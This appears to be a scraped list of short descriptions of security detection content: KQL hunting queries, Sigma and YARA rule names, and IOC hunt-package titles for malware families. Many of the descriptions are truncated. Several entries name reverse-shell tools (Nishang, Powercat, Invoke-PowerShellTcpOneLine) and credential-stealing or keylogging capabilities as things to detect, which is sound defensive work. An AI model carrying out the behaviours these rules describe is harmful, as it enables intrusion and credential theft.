Microsoft has observed attackers exploiting vulnerabilities associated with Log4J.
This query was originally published in the threat analytics report, Sysrv botnet evolution. Sysrv is a Go-based botnet that targets both Windows and Linux servers, and steals resources to mine cryptoc
Aria SBox 2
Look for Base64 table
BigDig bpInit
BigDig mpModExp
BigDig mpModInv
BigDig mpModMult
BigDig mpModulo
BigDig spModExpB
BigDig spModInv
BigDig spModMult
Look for 128-bit key Chacha stream cipher constant
Look for 256-bit key Chacha stream cipher constant
CryptoPP ApplyFunction
CryptoPP Integer constructor
CryptoPP RsaFunction
Look for DCP Blowfish EncryptCBC
Look for DCP Blowfish Init
Look for DCP Des EncryptECB
Look for DCP Des Init
Look for DCP RijnDael EncryptECB
Look for DCP RijnDael Init
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
Look for Compare string function
Look for Copy function
Look for DecodeDate (DecodeDateFully) function
Look for Form.Show function
Look for IntToStr function
Look for Random function
Look for RandomRange function
Look for StrToInt function
Microsoft has observed threat actors exploiting vulnerabilities associated with Log4J.
Prior to deploying Macaw ransomware in an organization, the adversary will disable all controlled folders, which will enable them to be encrypted once the ransomware payload is deployed.
Dopplepaymer In-Memory Malware Implant. This query identifies processes with command line launch strings. Which match the pattern used in Dopplepaymer ransomware attacks.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_dragonfly.yml. Questions via Twitter: @janvonkirchheim.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_elise.yml. Questions via Twitter: @janvonkirchheim.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_equationgroup_c2.yml. Questions via Twitter: @janvonkirchheim.
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
This query searches for a string pattern detected in evasive PowerShell usage. Jupyter or SolarMarker will iterate on this pattern multiple times to read data and call additional processes. This query
Use this query to find Excel launching anomalous processes congruent with Qakbot payloads which contain additional markers from recent Qakbot executions. The presence of such anomalous processes indic
FGint RsaSign
Use this query to find attempts to access files in the local path containing Outlook emails.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_hurricane_panda.yml. Questions via Twitter: @janvonkirchheim.
The following query can locate activity possibly associated with the EUROPIUM threat actor
This query looks for Microsoft Defender Antivirus detections related to EUROPIUM actor
This query looks for identity add through exchange PowerShell
Directly prior to deploying Macaw ransomware in an organization, the attacker will run several commands designed to disable security tools and system recovery tools.
Prior to deploying Macaw ransomware in an organization, the adversary will disable several tools and functions in order to inhibit later recovery efforts.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_judgement_panda_gtr19.yml. Questions via Twitter: @janvonkirchheim.
'This query looks for Microsoft Defender Antivirus detections with the family names used by KNOTWEED'
'This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\'
'This query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections'
'This query looks for new files being downloaded using Curl.'
'This query identifies matches based on KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables'
'This query identifies modifications to COM registry keys to point to executable files in C:\Windows\System32\spool\drivers\color\'
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavi
LockBox DecryptRsaEx
LockBox EncryptRsaEx
LockBox RsaEncryptFile
LockBox TlbRsaKey
Backdoor processes associated with OceanLotus Mac Malware Backdoor. References:. Https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS platform
Backdoor processes associated with OceanLotus Mac malware backdoor dropper. References:. Https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/. OS
Prior to deploying Macaw ransomware in an organization, adversaries will change the password for hundreds or thousands of accounts in order to lock users out of the network and impeded recovery effort
Miracl Big constructor
Miracl mirsys init
Miracl mirvar
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_oceanlotus_registry.yml. Questions via Twitter: @janvonkirchheim.
OpenSSL BN_mod_exp_inverse
OpenSSL BN_mod_exp_mont
OpenSSL BN_mod_exp_recp
OpenSSL BN_mod_exp_simple
OpenSSL BN_mod_exp2_mont
YARA rule: OpenSSL_DSA
YARA rule: pkcs8_private_key_information_syntax_standard
Prior to deploying Macaw ransomware in an organization, adversaries wil use Attrib to display file attribute information on multiple drives and all subfolders.
Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is i
Use this query to find email stealing activities ran by Qakbot that will use "ping.exe -t 127.0.0.1" to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indi
Use this query to find email stealing activities ran by Qakbot that will use "ping.exe -t 127.0.0.1" to obfuscate subsequent actions. Email theft that occurs might be exfiltrated to operators and indi
Use this query to find reconnaissance and beaconing activities after code injection occurs. Reconnaissance commands are consistent with the current version of Qakbot and occur automatically to exfiltr
Find use of Alternate Data Streams (ADS) for anti-forensic purposes. Alternate Data Streams execution.
Adversaries are likely attempting to delete backup files in healthcare environments to eliminate recovery options
// Look for cipher.exe deleting data from multiple drives. This is often performed as an anti-forensic measure prior to encryption.
// Look for attempts to use fsutil.exe to delete file system logs that can be used as forensic artifacts.
Identify accounts that have logged on to affected endpoints. Check for specific alerts.
Find distinct evasion and execution activities. Associated with the Robbinhood ransomware campaign.
Find attempts to stop System Restore and. Prevent the system from creating restore points.
Locate vulnerable Gigabyte drivers used by RobbinHood ransomware to turn off security tools.
RijnDael AES
RijnDael AES (check2) [char]
RijnDael AES S-inv [char]
RsaEuro NN_modInv
RsaEuro NN_modMult
RsaRef2 NN_modExp
RsaRef2 NN_modInv
RsaRef2 NN_modMult
RsaRef2 RsaPrivateDecrypt
RsaRef2 RsaPrivateEncrypt
RsaRef2 RsaPublicDecrypt
RsaRef2 RsaPublicEncrypt
'This query identifies matches based on domain IOCs related to Star Blizzard against Microsoft Defender for Endpoint device network connections'
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the
StrRAT is a Java-based remote access tool which steals browser credentials, logs keystrokes and take remote control of infected systems. It also has a module to download additional payload onto to the
Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities that mainly proliferates through search engine optimization
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing identifiable strings in PowerShell commands.
Attackers may use unconventional PowerShell curl flags
Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability utilizing the ws_TomcatService.exe process to launch malicious processes.
Hunt package for 95 IOCs associated with ClearFake
Hunt package for 3 IOCs associated with KongTuke
Hunt package for 8 IOCs associated with SmartApeSG
Hunt package for 100 IOCs associated with Unknown malware
Hunt package for 5 IOCs associated with Unknown RAT
Hunt package for 3 IOCs associated with Amadey
Hunt package for 6 IOCs associated with Cobalt Strike
Hunt package for 2 IOCs associated with Lumma Stealer
Hunt package for 5 IOCs associated with Nanocore RAT
Hunt package for 9 IOCs associated with Remcos
The Stealc malware is a data exfiltration tool designed to steal sensitive information such as credentials and system data from infected hosts. It typically arrives via phishing emails or malicious websites containing malicious URLs that download and execute the payload. SOC analysts should monitor for unusual outbound traffic patterns, unexpected data transfers, and signs of lateral movement or command-and-control communication beyond the identified URLs.
Hunt package for 2 IOCs associated with ValleyRAT
Hunt package for 4 IOCs associated with Vidar
Look for Random function
Hunt package for 17 malicious URLs tagged as 32-bit
Hunt package for 8 malicious URLs tagged as arm
Hunt package for 51 malicious URLs tagged as ClearFake
Hunt package for 18 malicious URLs tagged as elf
Hunt package for 3 malicious URLs tagged as malware_download
Hunt package for 4 malicious URLs tagged as mirai
Hunt package for 2 malicious URLs tagged as Mozi
Hunt package for 12 malicious URLs tagged as ua-wget
Prior to deploying Macaw ransomware in an organization, the adversary frequently uses MSBuild.exe as a LOLBin to communicate with the C2.
Look for Random function
Look for Random function
YARA rule: x509_public_key_infrastructure_cert
This query will hunt for files matching the current abuse.ch recent threat feed based on Sha256. Currently the query is set up to analyze the last day worth of events, but this is configurable using t
This query will hunt for files matching the current abuse.ch recent threat feed based on Sha256. Currently the query is set up to analyze the last day worth of events, but this is configurable using t
Sample query that search for .settingcontent-ms that has been downloaded from the web. Through Microsoft Edge, Internet Explorer, Google Chrome, Mozilla Firefox, Microsoft Outlook. For questions @Mila
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_babyshark.yml. Questions via Twitter: @janvonkirchheim.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_apt29_thinktanks.yml. Questions via Twitter: @janvonkirchheim.
Bazacall malware uses emails that contain a phone number for the user to call in order to cancel a fake subscription. These emails contain no links or attachments, and use automatic payment lures to t
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_bear_activity_gtr19.yml. Questions via Twitter: @janvonkirchheim.
Original Sigma Rule: https://github.com/Neo23x0/sigma/blob/master/rules/apt/apt_cloudhopper.yml. Questions via Twitter: @janvonkirchheim.
Microsoft has observed Bazacall using Cobalt Strike in order to move laterally to other machines on the network.
DES [long]
DES [pbox] [long]
DES [sbox]
This is a query to retrieve last 30 days network connections to known Dofoil NameCoin servers. The full article is available here: https://cloudblogs.microsoft.com/microsoftsecure/2018/04/04/hunting-d
BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Ex
BazaCall is a campaign that manipulate users into calling a customer support center, where they are instructed to download an Excel file to unsubscribe from a phony service. When the user opens the Ex
Bazacall uses malicious macro-enabled Excel documents to execute their payload.
FGint Base256StringToGInt
FGint ConvertBase256StringToHexString
FGint ConvertBase256to64
FGint ConvertHexStringToBase256String
FGint DSAPrimeSearch
FGint DSASign
FGint DSAVerify
FGint ECAddPoints
FGint ECElGamalEncrypt
FGint ECPointDestroy
FGint ECPointKMultiple
FGint FGIntToBase256String
FGint FindPrimeGoodCurveAndPoint
FGint PGPConvertBase256to64
FGint RsaDecrypt
FGint RSAEncrypt
FGint RSAVerify
Bazacall uses malicious Excel files to execute payloads on affected devices.
Microsoft has observed compromises related to Bazacall resulting in theft of the Active Directory database using ntdsutil.exe.
Microsoft has observed Bazacall using a renamed version of Rclone for data exfiltration.
During the chain of events from Bazacall to Bazaloader, RunDLL makes several network connections, including to command and control (C2) infrastructure. The command line for these connections contains
The "Stolen Images" Bazarloader campaign uses fake copyright infingement contact form emails and malicious files pretending to contain "stolen images" to trick users into downloading the malware.
Hunt package for 103 IOCs associated with ClearFake
Hunt package for 7 IOCs associated with KongTuke
Hunt package for 6 IOCs associated with Unknown malware
Hunt package for 2 IOCs associated with Lumma Stealer
Hunt package for 6 IOCs associated with Nanocore RAT
Quasar RAT is
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data, including passwords and browser cookies, by establishing covert communication with command-and-control servers. It typically arrives via phishing emails containing malicious links or compromised websites that deploy the malware through exploit kits or malicious attachments. SOC analysts should monitor for lateral movement indicators, unusual outbound traffic patterns
Hunt package for 16 IOCs associated with Vidar
Hunt package for 47 malicious URLs tagged as 32-bit
ClearFake is a malware family that primarily functions as a data exfiltration tool, leveraging command-and-control (C2) communication to
Hunt package for 3 malicious URLs tagged as malware_download
The Mozi malware family is a downloader that establishes command-and-control (C2) communication to exfiltrate data and deploy additional payloads. It typically arrives via phishing emails or malicious websites leveraging
In the campaign where Bazarloader is delivered via emails containing pw protected zip attachments, regsvr32.exe is used to launch a malicious payload that is disguised as a JPG file.
The pw protected zip attachment -> Word doc delivery method of Bazarloader utilizes Word to create an .hta file and launch it via MSHTA to connect to a malicious domain and pull down the Bazarloader p
This query offers daily categorization of ASR rules, helping SOC analysts monitor specific categories like office-related activities or WMI among the 16 rules. It aids in tracking detection rates and
'Under specific circumstances, executing KQL queries can exfiltrate information like access tokens, regarding external data functions like adx(). This query tries to list executed KQL queries that use
'This hunting query looks for increases in the number of workspaces queried by a user.'
CryptoPP a_exp_b_mod_c
CryptoPP modulo
FGint Base10StringToGInt
FGint FGIntDivMod
FGint FGIntDestroy
FGint FGIntModExp
FGint MontgomeryModExp
FGint MulByInt
'This hunting query identifies GitHub activites its the first time a user deleted a repo that may be a sign of compromise.'
'This hunting query identifies Accounts that are new or inactive and have accessed or used GitHub that may be a sign of compromise.'
'This hunting query identifies GitHub activites where there are a large number of deletions that may be a sign of compromise.'
'This hunting query identifies GitHub OAuth Apps that have restrictions disabled that may be a sign of compromise. Attacker will want to disable such security tools in order to go undetected. '
'Attacker can exfiltrate data from your GitHub repository by cloning it. This hunting query tracks clone activities for each repository, allowing quick identification of anomalies/excessive clones to
Adversaries may exploit GitHub's public access to exfiltrate sensitive data or distribute malicious code by converting private repositories to public, leveraging the platform's visibility for covert operations. SOC teams should proactively
'This hunting query identifies GitHub activites where permissions are updated that may be a sign of compromise.'
'This hunting query identifies Accounts in GitHub that have granted access to another account which then grants access to yet another account that may be a sign of compromise.'
Looks for MD5 API
Look for MD5 constants
Miracl crt
Miracl powmod
'This hunting query looks for users who are running multiple queries that return either a very large amount of data or the maximum amount allowed by the query method.'
'This hunting query looks for clients running queries that have not previously been seen running queries.'
'This hunting query looks for new Service Principals running queries that have not previously been seen running queries.'
'This hunting query looks for users who have run queries calling a watchlist template relating to sensitive data that have not previously been seen calling these watchlists.'
'This hunting query looks for users who have run queries that have not previously been seen running queries.'
'This hunting query looks for anomalously large LA queries by users.'
'This hunting query looks for queries that appear to be looking for secrets or passwords in tables.'
The RC6_Constants rule detects binaries containing RC6 encryption constants, which may indicate malicious activity leveraging the RC6 cipher.
Look for RIPEMD-160 constants
Look for SHA1 constants
Look for SHA2/BLAKE2/Argon2 IVs
Look for SHA384/SHA512 constants
Look for TEA Encryption
Hunt package for 3 IOCs associated with Kimwolf
The Mirai malware family compromises IoT devices by exploiting default credentials and weak security configurations, turning them into bots for large-scale DDoS attacks. It typically arrives via network exploitation, leveraging un
Hunt package for 77 IOCs associated with ClearFake
Hunt package for 2 IOCs associated with FAKEUPDATES
The KongTuke malware is a data exfiltration tool that establishes
Hunt package for 36 IOCs associated with Unknown malware
The Havoc malware family is designed for data exfiltration and persistence, often leveraging encrypted communication channels to steal sensitive
Hunt package for 20 IOCs associated with Lumma Stealer
Hunt package for 7 IOCs associated with Quasar RAT
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames,
Hunt package for 3 IOCs associated with ValleyRAT
Vidar is a data exfiltration malware
The "32-bit" malware
Hunt package for 38 malicious URLs tagged as ClearFake
Hunt package for 3 malicious URLs tagged as malware_download
Hunt package for 9 malicious URLs tagged as Mozi
'This hunting query looks for users whose total returned data that is significantly above their average.'
'This hunting query looks for users who have multiple failed queries in a short space of time.'
Look for WhirlPool constants
'Threat actors can use JPEG files to hide malware, or other malicious code from inspection. This query looks for the downloading of abnormally large JPEG files from a source where large JPEG files hav
Looks for advapi API functions
'This query look for users starting an Azure CloudShell session and summarizes the Azure Activity from that user account during that timeframe (by default 1 hour). This can be used to help identify ab
'This hunting query will identify where a file is uploaded to Azure File or Blob storage and is then accessed once before being deleted. This activity may be indicative of exfiltration activity.'
'This hunting query will try to identify instances where a file us uploaded to file storage and then deleted within a given threshold. By default the query will find instances where a file is uploaded
'Looks for file uploads actions to Azure File and Blob Storage from known VPS provider network ranges. This is not an exhaustive list of VPS provider ranges but covers some of the most prevalent provi
'Detect mass file deletion events within Azure File and Blob storage. deleteWindow controls the period of time the deletions must occur in, whilst the deleteThreshold controls how many files must be d
Looks for big numbers 20:sized
Detects 32-bit numeric values that may indicate obfuscation
Looks for big numbers 48:sized
Looks for big numbers 64:sized
Looks for big numbers 128:sized
Looks for big numbers 256:sized
Look for Blowfish constants
'Discover all critical ports from a list having rules like 'Any' for sourceIp, which means that they are opened to everyone. Critial ports should not be opened to everyone, and should be filtered.'
'This query looks at the last 14 days for "Consent to application" operation by a user/app which could potentially mean unauthorized access. Additional context is added from AuditLogs based on Corrlea
Look for CRC16 table
Look for CRC32 [poly]
Look for CRC32 table
CRC32 table lookup
Look for CRC32b [poly]
Look for CRC32c (Castagnoli) [poly]
Looks for crypt32 CryptBinaryToStringA function
"This Kusto (KQL) hunting query detects blob-enumeration or file-spraying behaviour in Azure Storage by: - Aggregating requests into time-bound sessions with row_window_session(). - Defining a "us
Look for ElfHash
Look for FlyUtils.CnDES Decrypt ECB function
Look for FlyUtils.CnDES Encrypt ECB function
'This hunting query identifies a user that add/invite a member to the organization for the first time. This technique can be leveraged by attackers to add stealth account access to the organization.'
'This query will look for events where guest user was invited but has not accepted/redeemed invite for unusually longer period. Any invites not redeemed for longer period of time can be misused and
'Detects observed Visual Studio Code (VS Code) extension installation activity on a user's system within the query time range. Note: This query does not return a complete per-user inventory of instal
"This query searches for any action type with high frequency that involves adding, modifying, or removing something in cloud app policies. It sees where the properties are modified such that the old v
'This hunting query looks in Azure Web Application Firewall data to find possible SpringShell Exploitation Attempt (CVE-2022-22965). The Spring Framework is one of the most widely used lightweight op
List of primes [char]
List of primes [long]
'Compares the current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by Azure Apps and automated approv
'Compares current day to last 14 days of audits to identify new audit activities. Useful for tracking malicious activity related to user/group additions/removals by specific users.'
'Finds instances where a file uploaded to blob or file storage and it is seen on an endpoint by Microsoft Defender XDR.'
Hunt package for 5 IOCs associated with Kimwolf
Hunt package for 112 IOCs associated with ClearFake
Hunt package for 2 IOCs associated with KongTuke
Hunt package for 3 IOCs associated with OtterCookie
Hunt package for 44 IOCs associated with Unknown malware
Hunt package for 3 IOCs associated with Cobalt Strike
Hunt package for 2 IOCs associated with Nanocore RAT
Hunt package for 2 IOCs associated with Remcos
SmartLoader is a multi-stage loader malware that establishes persistence and exfiltrates data by dropping additional payloads and maintaining command-and-control communication
StrelaStealer is a credential-stealing malware that exfiltrates
Vidar is a data exfiltration malware that steals credentials and sensitive information, often using encrypted channels to transmit stolen data to command-and-control servers.
Hunt package for 37 malicious URLs tagged as 32-bit
Hunt package for 24 malicious URLs tagged as ClearFake
Hunt package for 24 malicious URLs tagged as malware_download
Hunt package for 14 malicious URLs tagged as Mozi
'This hunting query will try to identify the user account used to perform a file upload to blob storage. This query can be used to match all file upload events, or filtering can be applied on filename
'Identifies when a new user is granted access and any subsequent audit related activity. This can help you identify rogue or malicious user behavior.'
'Detects when a user has successfully authenticated to another Microsoft Entra ID tenant with an identity in your organization's tenant. Ref: https://docs.microsoft.com/azure/active-directory/fundam
'Identifies accounts that have been added to a PIM managed privileged group'
'Identifies modifications to user's MFA settings. An attacker could use access to modify MFA settings to bypass MFA requirements or maintain persistence.
This query shows details about all approved Entra ID Governance Access Packages assignments. The results include the time the request was created and approved along with the justification text provide
'Looks for users retrieving BitLocker keys. Enriches these logs with a summary of alerts associated with the user accessing the keys. Use this query to start looking for anomalous patterns of key retr
'This detection looks the prevention of crash dumps being created. This can be used to limit reporting by malware, look for suspicious processes setting this registry key.'
Steal IE 7 credential
'breakdown of scripts running in the environment'
'Entropy calculation used to help identify Hosts where they have a high variety of processes(a high entropy process list on a given Host over time). This helps us identify rare processes on a given Ho
'Finds attempts to list users or groups using the built-in Windows 'net' tool '
'This hunting query looks for hosts exporting a mailbox from an on-prem Exchange server, followed by that same host removing the export within a short time window. This pattern has been observed by at
'Invoke-PowerShellTcpOneLine is a PowerShell script to create a simple and small reverse shell. It can be abused by attackers to exfiltrate data. This query looks for command line activity similar to
YARA rule: ldpreload
APC queue tasks migration
This rule checks MySQL database presence
'Looks for Base64-encoded commands associated with the Nishang reverse TCP shell. Ref: https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1'
'This hunting query identifies updates to the RequiredResourceAccess property of an OAuth application. This property specifies resources that an application requires access to and the set of OAuth per
'Powercat is a PowerShell implementation of netcat. Whilst it can be used as a legitimate administrative tool it can be abused by attackers to exfiltrate data. This query looks for command line activi
'Finds PowerShell execution events that could involve a download'
The 'rat_rdp
The 'rat_telnet' YARA rule detects the presence of a Remote Administration
Remote Administration toolkit VNC
Remote Administration toolkit using webcam
'This detection uses Normalized Process Events to hunt Signed Binary Proxy Execution: Rundll32 activities'
Sniff Lan network traffic
'Beyond your internal software management systems, it is possible you may not have visibility into your entire footprint of SolarWinds installations. This is intended to help use process exection inf
Malware can spread east-west file
Malware can spread east-west using share drive
Match Windows Http API call
Match Windows Inet API call
Match Windows Inet API library declaration
Match Winsock 2 API library declaration
'Summarizes uses of uncommon & undocumented commandline switches to create persistence User accounts may be created to achieve persistence on a machine. Read more here: https://attack.mitre.org/wiki/T
Attackers can use Adfind which is administrative tool to gather information about Domain controllers, ADFS Servers. They may also rename executables with other benign tools on the system. Below query
Hunt package for 113 IOCs associated with ClearFake
Hunt package for 4 IOCs associated with KongTuke
Hunt package for 43 IOCs associated with Unknown malware
Cobalt Strike is a sophisticated malware used for command and control (C2) operations, enabling attackers
The Lumma Stealer malware is a data-exfiltration tool that steals sensitive information such as credentials, browser data, and cryptocurrency wallet details. It typically arrives via phishing emails containing malicious URLs or compromised websites that deliver the payload. SOC analysts should monitor for unusual outbound traffic, unexpected process executions, and signs of credential theft or
Hunt package for 2 IOCs associated with MaskGramStealer
StrelaStealer is a credential-stealing malware that exfiltrates sensitive data such as usernames, passwords, and browser cookies by establishing command-and-control (C2) communication through malicious domains. It
Vidar malware is a data exfiltration tool that steals credentials and sensitive information via encrypted channels, often leveraging stolen credentials or phishing to maintain persistence. It typically arrives through malicious email attachments, compromised credentials, or exploit kits, using IP:port and URL IOCs to establish command-and
'Shows the rarest processes seen running for the first time. (Performs best over longer time ranges - eg 3+ days rather than 24 hours!) These new processes could be benign new programs installed on ho
Hunt package for 3 malicious URLs tagged as 118-107-44-190-8080
Hunt package for 3 malicious URLs tagged as 118-107-44-213-8080
Hunt package for 3 malicious URLs tagged as 118-107-44-253-8080
Hunt package for 15 malicious URLs tagged as 144-91-86-92
Hunt package for 6 malicious URLs tagged as 32-bit
Hunt package for 5 malicious URLs tagged as 38-76-199-154-8888
Hunt package for 2 malicious URLs tagged as ascii
Hunt package for 7 malicious URLs tagged as ClearFake
Hunt package for 29 malicious URLs tagged as malware_download
Hunt package for 11 malicious URLs tagged as mirai
Hunt package for 13 malicious URLs tagged as Mozi
Affect private profile
Create or check mutex
Affect private profile
Affect system registries
Affect system token
'This detection uses Normalized Process Events to detect System Shutdown/Reboot (MITRE Technique: T1529)'
This query identifies Copilot Studio AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because the
This query identifies AI agents whose owners are either disabled or removed from the organization. Orphaned agents without an active owner pose governance and security risks because no one is account
This query identifies AI agents that remain unpublished and have not been modified for at least 30 days. While these agents may not pose an immediate security threat, they can create operational inef
Perform crypto currency mining
Inject certificate in store
'This detection uses Normalized Process Events to hunt Certutil activities'
This query identifies Copilot Studio AI agents that are published and contain actions configured with Author Authentication (maker`s personal credentials) but have not been used or invoked in the last
This query identifies Copilot Studio AI agents that contain hard-coded credentials in Topics or Actions. Storing credentials in clear text within agent logic creates a security risk because these sec
This query identifies Copilot Studio AI agents that use HTTP actions to endpoints where Power Platform connectors are available (e.g., graph.microsoft.com, management.azure.com). Using direct HTTP ca
This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the ri
This query identifies Copilot Studio AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unau
Identifies Copilot Studio AI agents with Model Context Protocol (MCP) tools configured using maker credentials. This configuration can create security risks because the tool runs with the maker`s pers
This query identifies Copilot Studio AI agents without authentication mechanisms. Authentication is an agent-level configuration. Such misconfiguration poses significant security risks because when t
This query identifies Copilot Studio AI agents that are shared broadly-either with the entire organization or configured for multi-tenant access. Such configurations significantly increase the risk of
This query identifies Copilot Studio AI agents that are published and use the maker`s personal credentials in their authentication or integration flows. This configuration introduces security risks b
This query identifies Copilot Studio AI agents that are published but have not been used by any user in the organization for the last 30 days. Dormant agents can create unnecessary exposure and may s
Advers
This query identifies Copilot Studio AI agents configured to send emails to external mailboxes (outside the organization`s domains). Such configurations can lead to sensitive or internal data being e
This query identifies Copilot Studio AI agents with classic orchestration that include Actions not referenced in any Topic. While unused Actions may not pose an immediate security risk, they can intr
Steal Firefox credential
Steal credential
Steal VNC credential
' This hunting query looks for process command line activity related to activity observed by Dev-0056.The command lines this query hunts for are used as part of the threat actor's post exploitation ac
'This hunting query looks for hosts that have attempted to interact with the Discord CDN. This activity is not normally invoked from the command line and could indicate C2, exfiltration, or malware de
Dynamic DNS
Escalade priviledges
'The Exchange Powershell Snapin was loaded on a host, this allows for a Exchange server management via PowerShell. Whilst this is a legitimate administrative tool it is abused by attackers to performs
Run a keylogger
Lookup Geolocation
Lookup external IP
Communication using dga
Communications use DNS
File downloader/dropper
Communications over FTP
Communications over HTTP
Communications over IRC network
Communications over SSL
Communications over RAW socket
Take screenshot
Record Audio
Hunt package for 6 IOCs associated with Kimwolf
Hunt package for 107 IOCs associated with ClearFake
Hunt package for 6 IOCs associated with Unknown malware
Hunt package for 4 IOCs associated with Unknown Stealer
Hunt package for 2 IOCs associated with Remcos
Hunt package for 66 IOCs associated with StrelaStealer
Hunt package for 6 IOCs associated with Vidar
Hunt package for 21 malicious URLs tagged as 32-bit
Hunt package for 30 malicious URLs tagged as ClearFake
Hunt package for 18 malicious URLs tagged as elf
Hunt package for 10 malicious URLs tagged as exe
Hunt package for 12 malicious URLs tagged as malware_download
The Mozi malware family is a backdoor that enables remote command execution and data exfiltration, often used for persistent access and espionage. It typically arrives via phishing emails containing malicious URLs or through compromised websites hosting malicious domains. SOC analysts should monitor for unusual outbound traffic to listed domains, signs of lateral movement,
This query identifies A365 AI agents that contain hard-coded credentials in their tools or actions. Storing credentials in clear text within agent logic creates a security risk because these secrets
This query identifies A365 AI agents that send HTTP requests to endpoints using non-HTTPS schemes. Communication over unencrypted HTTP exposes sensitive data in transit and increases the risk of inte
This query identifies A365 AI agents that send HTTP requests to endpoints using non-standard ports (other than 443). Communication over uncommon ports can indicate suspicious activity, unauthorized n
This query identifies A365 AI agents that have Model Context Protocol (MCP) tools configured. MCP tools extend agent capabilities but introduce additional security considerations because they can exec
This query identifies A365 AI agents that have tools configured but they are not mentioned in instructions. This query identifies A365 AI agents that have tools configured but are not mentioned in in
This query identifies A365 AI agents whose owners are either disabled or removed from the organization, and are not blocked. Orphaned agents without an active owner pose governance and security risks
This query identifies A365 AI agents that are shared publicly. Such configurations significantly increase the risk of unauthorized access by unintended users, which could lead to data exposure or misu
This query identifies A365 AI agents that are published but have short or insufficient instructions. Short instructions increase the risk of prompt injection attacks, where malicious input can influe
This query identifies A365 AI agents that are published but lack configured instructions. Missing instructions increase the risk of prompt injection attacks, where malicious input can influence the a
Check if hotfix are applied
This query identifies Copilot Studio AI agents using generative orchestration to send emails via the Outlook connector where all action input values are populated dynamically by the orchestrator. Th
Create a COM server
Create a new process
Create a windows service
Bypass DEP
Disable Task Manager
'This query looks for messages related to file downloads of suspicious file types on an Exchange Server. This could indicate attempted deployment of webshells. This query uses the Exchange HttpProxy
'This query looks for suspicious request patterns to Exchange servers that fit patterns recently blogged about by PeterJson. This exploitation chain utilises an SSRF vulnerability in Exchange which ev
'This alerts when the account setting is changed to allow either external domain access or anonymous access to meetings.'
'Identifies when 30 or more ports are used for a given client IP in 10 minutes occurring on the IIS server. This could be indicative of attempted port scanning or exploit attempt at internet facing we
'Identifies when 100 or more failed attempts by a given user in 10 minutes occur on the IIS Server. This could be indicative of attempted brute force based on known account information. This could als
Hijack network configuration
Code injection with CreateRemoteThread in a remote process
Communications dyndns network
Communications over P2P network
Communications smtp
Communications smtp
Communications smtp
Listen for incoming communication
Communications over TOR network
Communications over Toredo network
Communications over UDP network
Install itself for autorun at Windows startup
'This query looks for suspicious request patterns to Exchange servers that fit a pattern observed by Silk Typhoon actors. The same query can be run on HTTPProxy logs from on-premise hosted Exchange se
'This query looks for messages related to file downloads of suspicious file types. This query uses the Exchange HttpProxy AOBGeneratorLog, you will need to onboard this log as a custom log under the t
'Alerts in links that have been shared across multiple Zoom chat channels by the same user in a short space if time. Adjust the threshold figure to change the number of channels a message needs to be
Hunt package for 124 IOCs associated with ClearFake
Hunt package for 12 IOCs associated with Unknown malware
Hunt package for 25 IOCs associated with Unknown Loader
